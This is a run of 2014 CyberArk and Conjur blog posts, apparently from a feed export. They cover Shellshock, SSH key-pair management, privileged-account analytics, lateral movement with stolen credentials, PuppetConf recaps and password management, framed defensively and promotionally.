How serious is this? Bash is a standard, free, tool for all UNIX-based operating systems and Apple’s OS X. One of the largest industries to rely on UNIX-based systems is the energy sector, who’s SCADA and industrial control systems are largely built on this technology.  Additionally, it is widely used on simple Internet connected devices, meaning that not only can servers be compromised but also home routers, IP cameras … think in terms of the Internet of Things.

What does Shellshock do? In a nutshell, it allows attackers to execute code remotely, leaving organizations susceptible to unauthorized processes or commands on target machines. This type of ‘open door’ is the ideal entry point for a classic advanced persistent threat.

What can you do to defend against such a zero-day? A zero-day is limited to one piece of technology, or any machine that runs the affected technology. From there, the attacker needs to find other ways to jump beyond the reach of the zero-day.  Focus on privileged account security, so any attack is limited in scope and damage by cutting off an attacker’s ability to move laterally from an affected machine to others in the network.

From a privileged account security perspective, here’s what we recommend:

1. Harden UNIX servers: Since Shellshock targets UNIX machines, organizations should harden their servers. This can be done by implementing a ‘least privilege’ strategy and preventing unlimited root shell accesses. CyberArk On-Demand Privileges Manager enables companies to remove unnecessary root privileges, while tightly controlling or restricting shell capabilities when needed. This means that only authorized commands can be run, rather than those injected by an attack, such as through Shellshock.

2. Monitor privileged account behavior: Exploited zero-day vulnerabilities most often lead to privileged credential theft as a way to move beyond the vulnerable machine. To identify this lateral movement, organizations should monitor account behavior for irregular behavior of privileged accounts. CyberArk Privileged Threat Analytics provides targeted, immediately actionable threat alerts by identifying previously undetectable malicious privileged user and account activity.

If you are concerned about your UNIX environment and the impact Shellshock might have on your organizations, we can help you.

]]>
Designing Least Privilege Into Modern Infrastructure https://www.cyberark.com/blog/designing-least-privilege-into-modern-infrastructure/ Tue, 07 Oct 2014 13:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/designing-least-privilege-into-modern-infrastructure/  

The last week has been a doozy for security breach followers.

Since the beginning of the month, two high-profile data breaches have been announced: JPMorgan and Yahoo have both announced that their systems were compromised, the former as a result of a systematic escalation of privileges attack (née APT, or advanced persistent threat), and the latter fallout from the ShellShock breach.

What we can see and learn from both is that the areas where security fails is continuing to break along the traditional lines of visibility, least privilege, and trust. In the case of JPM, there was likely an accrual of security debt from years of application acquisition, point-in-time decisions about who and what could use those software packages, and a lack of comprehensive visibility and control over that wide range of software, services, and the permissions that applied to each. Designing least privilege into modern infrastructure is likely the only thing that could have helped prevent these breaches, and over time we hope to see this become standard practice.

10_07_14As Ericka Chickowski over at Dark Reading points out, “investigations found that the attackers made their way deep into internal systems, gaining full administrative privileges on more than 90 servers.” In many ways, this reflects the same risk vector we at Conjur often repeat, originally made by Gus Hunt (former director of security at the CIA): you are only as strong as your weakest link.

In this sense, both Yahoo and JPM reveal not only that security is a wide-ranging problem that needs to be addressed across the entire technology stack, but also that we need to define and enforce new best practices as infrastructure is rebuilt and modernized. With respect to the big security vendors, there probably isn’t a commercial solution that would have prevented the kind of breach that JPM experienced — the scope was likely too broad, and the threat surface too wide to manage post-hoc.

The real solution is in solving for security from the ground up. The natural inflection point for this is when new infrastructure is being built: servers moved into AWS or Rackspace or Azure, automation tools like Jenkins (and Puppet, and Chef) spun up, and new virtualization and containerization platforms such as VMWare and Docker engaged. While there are no guarantees in the security arena, there is truth in the idea that good practices beget good practices. If you’re embarking on DevOps and cloud, take the time now to create a robust security stance and ensure that it doesn’t fall prey to the kinds of systemic weaknesses that most organizations have inherited from previous generations of technology and system design.

Keep an eye on this space over the coming months, as we’ll be describing some of these best practices in more detail, and helping design and architect security into Jenkins, Puppet, SaltStack, Docker, VMWare, and more.

 

 

]]>
Five Key Lessons from PuppetConf 2014 https://www.cyberark.com/blog/five-key-lessons-from-puppetconf-2014/ Mon, 29 Sep 2014 15:59:00 +0000 https://cyberarkvx2.wpengine.com/blog/five-key-lessons-from-puppetconf-2014/  

PuppetConf 2014 is behind us.

Running an event circuit every year can be challenging. On the vendor side of the booth, most exhibit floors look alike; it’s the rare show that is memorable, let alone definitional for an industry sine qua non.

PuppetConf bucks the trend. As a gathering point for the community (many of whom stopped by our booth to chat about topics that ran the gamut from IDM in Red Hat to encryption for GPG keys), the three days we spent in San Francisco were markedly focused on the most exciting themes in our world: automation, continuous integration, and modernization of infrastructure.

09_29_14

In the hallways, ballrooms, and sessions of the Marriott Marquis, we eagerly dove into the DevOps for a week, and while we are happy to be home, surfacing to the snap of a New England autumn has left us reflective. In considering our time there, we’ve assembled what we think of as the five essential take-aways from the conference:

1.Old tools are old.

Many of our discussions were driven by the recognition-and-knowing-smile that Active Directory, LDAP, Kerberos, RADIUS, and the like simply don’t scale to the kind of infrastructure that you see being automated and deployed through technologies like Puppet.

2.DevOps is the new home of “shadow IT”.

Simultaneously, the folks we heard from were on the forefront of technological adoption: they are solving real problems, making things work, and are willing to try new tools in order to make their teams more productive. Anything that blocks that initiative is sidestepped for the good of the business.

3.Audit and compliance problems are real.

DevOps, like any technology centeric group, needs to both drive their business forward and be able to prove that they are doing so with respect to their legal and ethical obligations. Handling PCI, PHI, PII, and other sensitive/regulated data imposes specific requirements upon the DevOps team, and demonstrating to auditors that those requirements are being met can be (as always) a headache.

4.Even carpenters hire plumbers.

By definition, DevOps teams are capable builders, with deep skill sets in technology. However, their time is highly valuable, overly taxed, and best spent on solving the problems that nobody else can. Even a casual stroll around the show floor at PuppetConf revealed that there is a robust ecosystem of vendors solving problems that shouldn’t be managed in-house just “because we can”.

5.SecDevOps is real.

The next frontier in the space is going to be the convergence of security and DevOps, what some are calling SecDevOps, by default. The concepts of people-centric security hold true in the DevOps world: your users — developers and IT teams, in this case — will not wait for approval; it behooves the DevOps team to get in front of issues and provide easy, secure, and robust alternatives to insecure behaviors, whether that means a facility for key distribution or a strong set of permissions for service-to-service communications.

What was your experience like? Do you see the SecDevOps frontier as being where you or your team are headed? Are there other lessons you’d focus on?

Let us know!

 

]]>
PuppetConf 2014 – Day One: Hiera-Eyaml, Drones, and More https://www.cyberark.com/blog/puppetconf-2014-day-one-hiera-eyaml-drones-and-more/ Wed, 24 Sep 2014 10:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2014-day-one-hiera-eyaml-drones-and-more/  

Team Conjur was out in force at PuppetConf 2014 yesterday, with our table set up front and center on the Golden Gate level of the event HQ at the Marriot Marquis. Over the course of the day, we had hundreds of conversations with the community of Puppet users, experts, and integrators, touching on everything from the relative security of hirea-eyaml (a good start, but not as robust as using Conjur to keep secrets out of Puppet manifests and Puppet master servers) to the future of continuous integration and DevOps.

09_24_14

One theme we’ve seen emerge on the show floor is that good infrastructure hygiene is growing in importance as configuration management tools like Puppet are becoming increasingly embedded into the IT and DevOps workflow. Many of the attendees who have come up to chat have said that they either are looking for alternatives to the traditional LDAP/Kerberos/RADIUS toolchain, or that they’ve made an attempt at finding a modern alternative and been unable to do so quickly and easily.

In many ways, this is exactly what Conjur offers: a simple to implement, easy to configure, and widely integrated authorization platform for permissions and secrets management. For the Puppet audience, we released our PuppetForge module yesterday morning to make this even faster!

Check it out, and if you’ve not already done so, register for our Parrot AR Drone raffle — we’ll be pulling the winning ticket at 9am PST!

 

]]>
PuppetConf 2014 – Opening Night https://www.cyberark.com/blog/puppetconf-2014-opening-night/ Tue, 23 Sep 2014 10:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2014-opening-night/  

Last night, we opened up PuppetConf 2014 at the cocktail reception hour, to a fantastic reception: amidst a dubstep and dance music backing, the Puppet team went out of their way to make everyone feel welcome and comfortable, with a friendly and open bar, servers threading between the crowd with a wide range of hors d’oeuvres, and a lot of deep conversation about what Conjur is and how it works.

09_23_14

We chatted about RADIUS and Kerberos, and their respective role in the modern IT infrastructure (still there, but harder to rely on exclusively), how Netflix used Conjur to avoid implementing a new AD or OpenLDAP system (lots of heads nodding), and how easy it was to get started with Conjur at no cost.

We’re looking forward to many more over the next two days – come say hello! We’re on the Golden Gate Level, just outside of the coat check room, and we’ll be raffling off a video-enabled AR drone, handing out our (we think) cool t-shirts, and going deep on how to monitor, manage, secure, and audit your infrastructure with Conjur.

 

 

]]>
See you soon at 2014 PuppetConf! https://www.cyberark.com/blog/see-you-soon-at-2014-puppetconf/ Fri, 19 Sep 2014 10:08:00 +0000 https://cyberarkvx2.wpengine.com/blog/see-you-soon-at-2014-puppetconf/  

Conjur is heading to the 2014 PuppetConf!

Our plane tickets are printed, our banner is shipped, but the suitcases are another story…

09_19_14

Either way, Conjur is delighted to be sponsoring and attending the 2014 PuppetConf! We’ll be camping out for the duration of the conference on the Golden Gate level, booth 33; just look for the big Conjur sign!

 

We have a 2014 Autumn Automation Contest in which we are raffling off a video-enabled Parrot AR Drone Quadricopter to anyone who takes 15 minutes to chat with us about authz, automation, and DevOps! To enter, either fill out our raffle entry form (link below) to schedule a 15 minute chat or pop by our table. The winning ticket will be drawn on Wednesday, September 24th at 9am PST.

We’ll also be handing out our new Conjur t-shirts, so stop by!

Looking forward to seeing you all there!

 

]]>
Key Management in the Cloud – Part 2 https://www.cyberark.com/blog/key-management-in-the-cloud-part-2/ Wed, 17 Sep 2014 10:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/key-management-in-the-cloud-part-2/  

Key Pair Management: Cloud Security

This is the second and final installment of our Key Management in the Cloud blog posts. You can find part one here.

In the first part of this series, we described three concepts of key management:

  • A key pair is composed of a public and a private key.
  • Public keys are not secrets.
  • Selective distribution of public keys conflates authentication and authorization.

Today, let’s examine the flaws of “public key pushing”, and describe a better alternative.


Strike #1: “Public key pushing” allows escalation of privilege.

Once Bob gains root access to a host, he can see all the public keys on that machine. Normally this is not a problem, since public keys are public and not secrets; but here, what happens if Bob finds Alice’s public key on the host (or finds it elsewhere), and starts copying it to other hosts? Bob is using his knowledge of Alice’s public key to escalate her privilege level in the infrastructure. In effect, Bob can grant Alice access to any system that he himself has access to. The “public key pushing” technique is supposed to facilitate centralized management of SSH access, but in fact, the access is managed on each host itself in the authorized_keys file. The host access list can be changed by anyone with root-level access to the host, and the intended authorization policy cannot be guaranteed to be correct. Even if the management server is constantly re-pushing the public key lists out to every host, the key lists are only eventually consistent; as the server keeps wiping Alice’s key out of authorized_keys, Bob can keep putting it back, giving Alice plenty of opportunities to login.

Strike 2: Removing a user’s public key removes their ability to be identified.

09_17_14

It’s important to be able to audit the succeeded and failed login attempts to all your hosts. What happens when Alice tries to SSH to a host which hasn’t been “pushed” her public key? The host is unable to verify Alice’s identity. In effect, it looks like a non-Alice person has tried to authenticate as Alice, but that is not what happened at all! Alice is still Alice, but she doesn’t have access. These are two very different things. A failed authentication attempt means “someone you don’t know tried to claim to be someone you know”. A failed authorization attempt means “someone you know tried to access a system she doesn’t have access to”. From a security standpoint, these are quite different; but a “public key pushing” system can’t tell the difference.

Strike 3: Key-pushing scripts are fragile and easy to break.

Key-pushing scripts are typically stored in a configuration management system, along with scripts that serve many other purposes. Ideally, all these scripts function independently and reliably, but in practice, it’s easy to make an “unrelated” change to script A which breaks script B. During the time it takes to get everything working again, the (already weak) capabilities of the key-pushing system are seriously compromised.


At this point it should be clear that public keys are not secrets and shouldn’t be treated as such. So what is the right way to manage access to hosts?

SSH does have a proper mechanism for authorization: once authenticated, a user can be checked against an access list (e.g. via LDAP search). If the user isn’t authorized, they can’t login. The system doesn’t deny their identity, but it does deny their access. The proper outcome is effected (Alice can’t login), and the proper event is recorded (Alice was authenticated, but not authorized).

Now, let’s turn our attention now to the private key. Just as public keys should not be treated as secrets, there is an argument that private keys shouldn’t either. It’s not uncommon to see private keys loaded into secrets storage (version control, configuration management, etc), or even shared by email. What’s the problem with this? In effect, private keys are intended to be so secret that they are not shared with anyone. Sharing a private key is akin to sharing a password; it’s a security and compliance no-no. When you choose a password for a web application, the web app doesn’t actually store your password; it salts and hashes your password in a non-recoverable way, which is sufficient to verify your identity in the future, but it’s not possible to recover the password itself from its salted hash. Similarly, you should never provide a private key to any system or any other person. The public key is specifically designed to be safely sharable. If you need to authenticate yourself to another person or system, they don’t need to know your private key for that; just your public key.

 

]]>
Key Management In The Cloud – Part 1 https://www.cyberark.com/blog/key-management-in-the-cloud-part-1/ Tue, 16 Sep 2014 10:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/key-management-in-the-cloud-part-1/  

Cloud Key Management: Pairs, Security, and Authz

Key management is a frequent topic when discussing security, compliance, and the cloud in the DevOps and IT communities. Obviously, keys are used in a number of different ways, and have a wide range of different definitions that are technology bound. One area of focus in particular has implications for cloud security, often overlooked: key pair relationships.

As a recap, key pairs consist of a private key, which is kept secret by the owner, and a public key, which is associated with the owner and freely distributed. (Public and private keys are simply a string of very large numbers which have no discernable relationship to each other; knowing the public key doesn’t help you determine the private key, and vice versa).

Key pairs are often used for things like:

  • Encryption: a message is encrypted with the public key and it can be decrypted only with the private key
  • Digital Signatures: a message is signed with the private key and it’s authenticity can then be verified with the public key

In particular, consider how key pairs relate to SSH authentication; the scenario proceeds something like this:

  • Alice opens an SSH connection to a host
  • The host challenges Alice to present a signed message (see digital signature above)
  • Alice signs a message with her private key and sends it to the host
  • The host uses Alice’s public key to verify the message signature

If the signed message is authentic, the remote user is Alice. Otherwise the remote user is not authentic, and the connection is terminated.

09_16_14

The public key, therefore, is not a secret and its purpose is to be known counterpart to a private key. And yet, it is a common pattern in SSH management scripts (especially those used in configuration management tools such as Chef, Puppet, Salt, and Ansible) to misuse public keys by selectively distributing them to different machines. If public keys are not secrets, why are they being guarded in this manner?

The answer is that authentication is being conflated with authorization. Authentication is used to establish identity. Alice is Alice, and everyone else is not. Authorization is used to determine access levels and permissions. Once Alice is authenticated, then she is either granted or denied access based on permissions rules.

By trying to control which public keys are on each host, the SSH “public key pushing” technique described above creates a conflation of authentication and authorization. Selective public key pushing is intended to work like this: when Bob’s public key is pushed onto a host, then the host can authenticate Bob and he logs in. If Bob’s public key is removed, he can’t login any more. But…Bob is Bob. Removing his public key doesn’t make him not-Bob.

You may not realize it, but this authorization anti-pattern practice can lead to a number of practical security problems.

In part 2 of this blog series, we will look more at the operational and security flaws associated with this practice, and how Conjur can provide a strong, secure, auditable alternative.

 

]]>
Analyze This: How IP Addresses Can Save the Day https://www.cyberark.com/blog/analyze-ip-addresses-can-save-day/ Mon, 15 Sep 2014 14:21:33 +0000 https://www.cyberark.com/blog//

By CyberArk Labs

Everyone in the security business is talking about analytics – threat intelligence, big data, mining, etc. Clearly, sifting through huge amounts of data has significant value for understanding the complex nature of IT infrastructure and advanced cyber threats. However, a serious challenge presents itself around what data is important and what should move to the top of the pile. As our recent 2014 Global Advanced Threat Landscape survey showed, Snowden and retail/POS breaches influence security strategies the most, and the common factor in these attacks is the exploitation of privileged accounts.

Focusing on pinpointing malicious privileged account activity should be at the top of the list, given the significance of these credentials in every advanced attack. The challenge is how to do this in real-time to stop an in-progress attack. A behavior-based approach makes this much easier. For example, let’s take a look at privileged account activity correlated with IP address location.

It’s been well established that attackers seek out privileged credentials as a means to move throughout a network – either hopping from user to machine credentials or escalating to more powerful ones. While the attacker may blend into the normal workflows related to a set of hijacked accounts, the IP address they connect from can be a giant red flag. Normal day-to-day running of a company may require a sysadmin to access servers and databases quite often throughout the day. IP location tells us if that sysadmin is working from his normal office or somehow logged in from Russia …

Similarly, every network has normal connectivity behavior that, once modeled, can be used to detect an attack. For example, patterns will develop that show certain privileged accounts are used to connect from a particular computer or workstation, to a server, and never are those credentials used from a different device. IP location will tell you if that changes, indicating a possible attack. This is what happened in the 2012 RSA attack and was one of the indicators that something was wrong.

Another way to look at correlation is segmentation and IP address changes. It’s common to have a range of IP addresses accessing a set of servers, with one or two being dedicated to access only one server. If, suddenly this IP address connects to all servers, there might be something wrong.

The beauty of taking a behavioral-based approach to ID in-progress attacks is that once you layer models on top of each other, you create many baselines and compound dependencies that become nearly impossible to game. Check out our approach here.

]]>
Effective Behavior-based Defense https://www.cyberark.com/blog/effective-behavior-based-defense/ Thu, 11 Sep 2014 16:03:48 +0000 https://www.cyberark.com/blog//

By CyberArk Labs

Analytics are a tricky business, no matter what purpose they’re applied to, let alone for use to stop a cyber-attack in progress. Take behavioral analytics, for example. What’s simply odd and what’s a threat? And if you’re creating security profiles based on behavior, can’t the bad guys simply game the models you’re monitoring for?

First, let’s tackle what distinguishes a behavioral threat. The Night Dragon attacks were coordinated, covert and targeted cyber-attacks conducted in 2009 against global oil, energy, and petrochemical companies. Once the bad guys infiltrated the network of target companies, they went about their business, extracting information. When investigated, it appeared the malicious network traffic occurred on weekdays from 9:00 a.m. to 5:00 p.m. Beijing-time, well outside the normal working hours of these companies. And based on the volume of traffic it was highly likely to be more than simply a late night for the IT department. Clearly this was much more than ‘odd’ network access behavior.

The recently reported Energetic Bear attack on similar energy sector companies around the world in 2011 took this a step further (see our earlier post for details). In this attack, forensics found the timing data related to malware build hours, and command and control monitoring activity was consistently between 8:00 a.m. to 6:00 p.m. Moscow-time. Again, repeated activity outside of a company’s normal working patterns was indicative of an attack.

It hasn’t taken long for the bad guys to figure out that ‘active hours’ are being monitored as a general course of defense. Such an example is the 2013 cyber-attack against retail PoS installations. In one high-profile attack, the bad guys designed malware to only exfiltrate data between 10:00 a.m. and 6:00 p.m. local time, so as to disguise themselves in regular working-hours traffic.

It would seem that yes, the bad guys can game this defense quite easily once they know what activity is being monitored. However, the beauty of behavioral analytics is that it is nearly impossible to game the system once you layer models on top of each other, creating many baselines and compound dependencies within those individual models. And since behavioral analytics are based on actual usage data and rather than list-based rule-sets, the number and character of what models become a baseline alerting structure are virtually limitless.

Tuesday, we unveiled CyberArk Privileged Threat Analytics 2.0 – a behavior-based analytics solution designed to help organizations to rapidly identify and respond to in-progress attacks.  Click here for more information. You can also watch a video introduction to CyberArk Privileged Threat Analytics.

 

]]>
Powering Up Threat Detection with Privileged Threat Analytics https://www.cyberark.com/blog/powering-threat-detection-privileged-threat-analytics/ Tue, 09 Sep 2014 14:19:45 +0000 https://www.cyberark.com/blog//

By John Worrall

One of the most common and disturbing aspects of the data breaches and cyber-attacks we see on a weekly basis is that attackers typically are on the target company’s network for weeks, months and even years at a time without being detected. According to Mandiant, the median length of time that attackers are on an organization’s network before being detected is approximately 240 days.

Analytics were supposed to be one of the cures for this problem, however, security teams are being overwhelmed by big data, compromising a team’s ability to respond to alerts.

This is why CyberArk today unveiled Privileged Threat Analytics 2.0 – designed to help businesses cut through the clutter to rapidly identify and respond to in-progress attacks.  CyberArk does this by focusing on the data sets that matter most when it comes to identifying potential threats: privileged account activity.

As we’ve discussed in the past, the exploitation of privileged accounts is a critical component of all advanced attacks, primarily because of the power it yields to an attacker. Once an attacker makes it inside the perimeter, hijacked privileged credentials enable the attacker to hide in plain sight and move freely on the network, basically turning a company’s infrastructure against itself.

CyberArk Privileged Threat Analytics collects and analyzes privileged account activity, empowering businesses to immediately detect malicious privileged behavior and help shut down the most common avenue for attackers to move laterally on a company’s network.

Key to the new version are two-way, out-of-the-box integrations with leading SIEM vendors like HP ArcSight and Splunk Enterprise. We pull contextual data from what SIEM solutions collect to layer on top of the information our solutions monitors, to enable customers to pinpoint privileged-based threats that can be hidden in the vast troves of information collected by the SIEM systems.

Time and again, it’s been demonstrated that privileged accounts are the key to mitigating advanced attacks. Whether it’s the recent spate of retail/PoS attacks, the continued attacks on critical infrastructure, or attacks on financial and healthcare organizations through default passwords, the common denominator is that the exploitation of privileged accounts is at the heart of every cyber incident.

If attackers are relying on your privileged accounts to perpetrate their attacks, shouldn’t the activity on these accounts be the first thing you monitor? Don’t just rely on data – rely on the data that matters.

For more information, please visit https://www.cyberark.com/products/privileged-account-security-solution/privileged-threat-analytics/.

To view a video introduction to CyberArk Privileged Threat Analytics, please visit: https://cyberark.wistia.com/medias/f8nqebyjy1.

]]>
Release of Conjur 4.3 Beta https://www.cyberark.com/blog/release-of-conjur-4-3-beta/ Mon, 08 Sep 2014 11:11:00 +0000 https://cyberarkvx2.wpengine.com/blog/release-of-conjur-4-3-beta/  

Chef and Docker Security Improvements!

We are extremely excited to announce Conjur 4.3, our new beta release, with enhanced Chef and Docker security support!

09_08_14

The development team has been working around the clock on a number of new features, enhancements, and fixes to the already robust Conjur platform, and as of today, we are making it available for our customers upon request (to request access, just drop us a note at support@conjur.net).

Not only have we built out Conjur features, but we have also created some fantastic new integrations with some of your (and our) favorite software packages: Chef and Docker!

For the full scoop, click here to download our Release Notes document, which covers all the new features of Conjur 4.3!

 

]]>
Fighting Back Against Targeted Attacks https://www.cyberark.com/blog/fighting-back-targeted-attacks/ Fri, 05 Sep 2014 17:42:33 +0000 https://www.cyberark.com/blog//

By John Worrall

Energy and oil companies in Norway have been facing what local security authorities are calling, “the biggest targeted cyber-attack ever on local companies.”

These attacks are very similar to multiple attacks on critical infrastructure companies here in the U.S. and around the world. While we’ve become conditioned to expect news on attacks of this nature, the latest were followed with a surprising report: how one company was able to get ahead of the bad guys to mitigate their attack before damage was done.

The report on how Statoil continues to defend itself is revealing for critical infrastructure companies facing similar attacks.

Statoil provided some great insight into the attack methods used against it, including:

Attackers used watering hole tactics to gain access to employee credentials. This is a common tactic. In the case of Statoil, attackers targeted a well known international company that gathers data for the oil industry. By targeting and infecting this site, the attackers were able to identify and steal credentials from more than 40 Statoil employees – giving them the foothold they needed into the business.

Attackers elevated privileges on stolen credentials to gain additional information and access. This is the most common step in a targeted attack – gaining valid employee credentials and exploiting their privileges to gain broad access to the target network. This is the pathway we’ve seen used in almost every single advanced attack – from the recent spate of retail/PoS attacks, to the continued attacks on critical infrastructure. These two steps alone can give attackers broad access to the network they’re targeting, and are critical in advancing their attacks. This is also where Statoil was able to make its stand.

Because the company understands the power of privileged accounts, and the vulnerabilities they represent, they were able to incorporate the management of these accounts into their broader defense in depth strategy.

From the reports, Statoil’s team was first alerted to the breach when its intrusion detection system discovered that malicious code was trying to be downloaded to an employee machine. The code tried to enable communications with black listed areas of the network that aren’t normally used or accessed for normal business.

By following the privileged account activity, Statoil was able to back track, identify the infected machines that precipitated the attack, remove them from the network and make sure the employee credentials that were stolen were updated and secured. It’ll be interesting to see the additional details emerge, but Statoil provides a valuable lesson for companies by sharing the information they’ve released so far. Another example of why privileged account security is essential to any organizations defenses.

]]>
Conjur Featured on Devops.com https://www.cyberark.com/blog/conjur-featured-on-devops-com/ Thu, 04 Sep 2014 11:44:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-featured-on-devops-com/  

Cloud Authorization with Conjur

Conjur was made for DevOps; so much so we’ve been featured in a article on DevOps.com! Tony Bradley, founder of Bradley Strategy Group and well-known technical authority, spoke with Kevin O’Brien, founding member at Conjur, about how Conjur works in the DevOps sphere.

09_04_14

Moving into the cloud can be complicated, with technological issues that cross the authorization management and authentication spaces. Conjur can help solve these problems with its API-backed virtual appliance, built in the cloud, for the cloud. Conjur helps businesses with their cloud authorization, secret, and key management, including authorization of all users (human and machine alike), and how it replaces legacy tools unfit for the clouds, all while helping DevOps to automate their infrastructure.

Read on to learn what Tony and Kevin had to say about Conjur!

 

]]>
Meet Us at PuppetConf, Win a Drone! https://www.cyberark.com/blog/meet-us-at-puppetconf-win-a-drone/ Wed, 03 Sep 2014 11:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/meet-us-at-puppetconf-win-a-drone/  

PuppetConf 2014 and Conjur

Are you heading to PuppetConf 2014? Conjur will be there — booth 33, Golden Gate Level — and we’re very excited!

With only a couple weeks to go, we are also announcing our 2014 Autumn Automation Contest. We’re raffling off a video-enabled Parrot AR Drone Quadricopter to anyone who takes 15 minutes to chat with us about authz, cloud infrastructure, and DevOps security between now and Wednesday, September 24, at 9am PDT, either via phone call or at the event.

09_03_14

To enter, all you need to do is to fill out our sign-up form (link below). We’ll set up a time to talk about access intelligence, SSH management, controlling your cloud infrastructure, and anything else of interest to you.

For anyone we meet up with at PuppetConf, we’ll also give you one of our new t-shirts. They’re pretty funny. You’ll like them.

 

]]>
Keys to the IT Kingdom: Credentials and Lateral Movement https://www.cyberark.com/blog/keys-kingdom-credentials-lateral-movement/ Thu, 28 Aug 2014 17:49:28 +0000 https://www.cyberark.com/blog//

We have a saying at CyberArk, “privilege first,” and it refers to security strategy. Nearly every advanced attack relies on privileged escalation to carry out the breach. Don’t believe me? Here’s a quick reference: Backoff-based retail breaches, UPS Store PoS breach, Energetic Bear hacker activity and there are many others. In each of these, the attackers went after the ‘keys to the IT kingdom,’ privileged credentials. With these, they were able to move freely across the breached network. So why is lateral movement so closely linked to privileged credentials?

Prominent lateral movement techniques are dependent on obtained credentials stolen from the attacked network or individual. The Red October hacker activity for example, saw attackers compile a list of all credentials from any available location on the network in order to navigate the IT environment undetected from 2007 to 2013. If malicious activity raised suspicion on one set of credentials the attacker simply switched and moved to another area of the network.

There are many ways to move laterally across a network that depend on privileged credential use, including Pass-the-Hash attacks or remote access by stolen/guessed credentials. The latter is more common (Essentia Health is a good example). Where else can an attacker authenticate to once they have a foothold? Here are just a few possibilities:

  • Connections to shared files: enables an attacker access to available information as well as dropping malware onto a shared file
  • Log on to web portals with stolen credentials: enables an attacker to create an infection using the web portal, such as a reference to a malicious website
  • Accessing the Domain Controller: allows for both the extraction and internal reconnaissance information
  • Accessing the Exchange server or any other centralized server: creates an additional attack vector, for example sending an infected update or ‘poisoning’ any user who accesses the server by infecting their machine
  • Access to core infrastructure such as routers: enables an attacker to visualize the network beyond the accessed LAN network, and gain access by using relevant credentials
  • Remote execution of commands: allows the use of relevant credentials and a publicly available tool such as psexec from Microsoft, or a Shell
  • DNS poisoning: enables an attacker to redirect a victim to a different website than the address typed into a browser

These are just a few samples of why privileged credentials are critical to secure and why privilege must come first in every security strategy. Too often, privileged account security is left to the IT department to manage and approached from a compliance mindset.

 

]]>
Challenging Conventional Wisdom https://www.cyberark.com/blog/challenging-conventional-wisdom/ Tue, 26 Aug 2014 20:16:41 +0000 https://www.cyberark.com/blog//

By John Worrall

Every once in a while, people get shaken from their normal routines and have to question if what they’ve been doing is still relevant to their current situation. The raft of password-based cyber thefts for example, has everyone thinking of a better way to manage their credentials.

The truth of conventions and wisdom is that they are fluid and sometimes what was true yesterday may be irrelevant tomorrow. This is where we are today in the security industry and as Gandhi pointed out decades earlier, “It is unwise to be too sure of one’s own wisdom. It is healthy to be reminded that the strongest might weaken and the wisest might err.”

We are fortunate to be living through one of the pivotal moments in the security industry that forces a challenge to conventional wisdom. Here’s my challenge for the industry:

Stop Over-investing in the Perimeter

The perimeter isn’t dead – but it has been proven ineffective at preventing breaches.  Organizations need to stop focusing the lion’s share of effort on security tactics that don’t work. The ‘perimeter’ simply doesn’t matter in the world of advanced attacks such as USIS, P.F. Changs, eBay, Heartbleed, Snowden, retail PoS breaches and the list goes on. Countless research points this out, including our own recent research that shows that 52 percent of businesses believe hackers are on their network, or have been within the past year.  I argue that the other 48 percent are denying reality.

If the attackers are inside, does it really matter where they came from? Should defense strategies continue to depend on the point of origin? No.

How do attackers live undetected inside a company for a week, month or years? They steal and exploit valid credentials – a default printer password, a hard-coded password, an employee’s or partner’s credentials, an unprotected hash or other privileged account. With these in hand, an attacker is able to spiral through a network, hijacking additional accounts, elevating privileges to gain access to vast stores of information, data and control within an organization’s digital repositories.

This transformation of malicious outsider into a defacto insider enables an attacker to access sensitive assets, install malware and reach the attack goal – all by employing the same permissions and workflows that the organization established for its own, legitimate processes. Prevent this and you take away an attacker’s ability to take control of your very own infrastructure.

The string of recent, high-profile breaches is proof that the bad guys have figured out the perimeter doesn’t matter, so why is it taking so long for the good guys to accept this reality? Resources are already scarce for most organizations so we need to be smarter about how we use them. The first step is to accept tradition isn’t working and agree that it’s time to think unconventionally.

]]>
Passwords14: The Dust Has Settled – What Did We Learn? https://www.cyberark.com/blog/passwords14-dust-settled-learn/ Thu, 21 Aug 2014 14:17:28 +0000 https://www.cyberark.com/blog//

By Shiri Licht

Passwords14 is in the rearview mirror, yet the debate over how we handle passwords rages on. Should we accept weak passwords for trivial use? What action do we take in light of 1.2 billion passwords being stolen by a crime syndicate? How do businesses handle sensitive, privileged account credentials? As our research has shown, privileged-based breaches are now a major influence on larger security strategies.

An interesting approach to the password problem was presented during Passwords14 – the “Pavlovian password management” system. The idea is to provide incentives for users to choose stronger passwords, leading to the creating of a habit that hopefully will last over time.

The core issue tackled in the presentation is the trend for people to use easy-to-remember passwords that they can rely on for an extended period of time. The belief that there are simply too many passwords required for daily life, personal and professional, to not rely on a scheme, puts personal data and business data at risk.

The basic tenet of the Pavlovian method is that the user gets rewarded for good behavior, which is the choice of an effective password. There are a couple factors at play for what’s considered ‘effective’, including character choice, length, change-schedule, etc. Further, these attributes are related. If a password is less complex, the change interval will be shorter. Conversely, as a password gets more complex, the user will need to replace it less frequently. While this is a good start for personal accounts, it is not enough for business use.

Users will be able to game the system. The user will want to get the highest score by creating the strongest password and will get incentives in the form of less frequent requests to replace complex passwords. Yes, this method will lead (hopefully) to the creation of more complex passwords, however it will exacerbate the memory problem. Password template use will very likely increase as a means to remember these new, longer versions. Or users will write them down. For the same reason, there is also the danger of password reuse across multiple accounts.

Organizations need a better solution to protect key passwords – such as privileged accounts that control the access to their most sensitive assets. An automated password management tool is essential for making privileged account credentials as secure as possible. Once deployed, the level of complexity and randomness of managed passwords becomes much higher than if left to individual choice, while eliminating the memory problem. This also makes it possible to protect the passwords from malware that collects passwords through key logging, screen-capture and other means of intercepting passwords.

]]>
Heartbleed, Again https://www.cyberark.com/blog/heartbleed-again/ Wed, 20 Aug 2014 17:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/heartbleed-again/  

Heartbleed – Conjur’s Response

Earlier this week, news of the massive data breach (~4.5 million records) that hit Community Health Services rippled across the news. The implications are significant: while it is not believed that any healthcare data in specific was taken, the information stolen did constitute PHI, with social security numbers, home phone numbers and addresses, and patient names all stolen. Under HIPAA – a topic we have covered before from a compliance perspective – each of those patients can sue CHS individually; the legal and financial fallout will be complicated and lengthy at best.

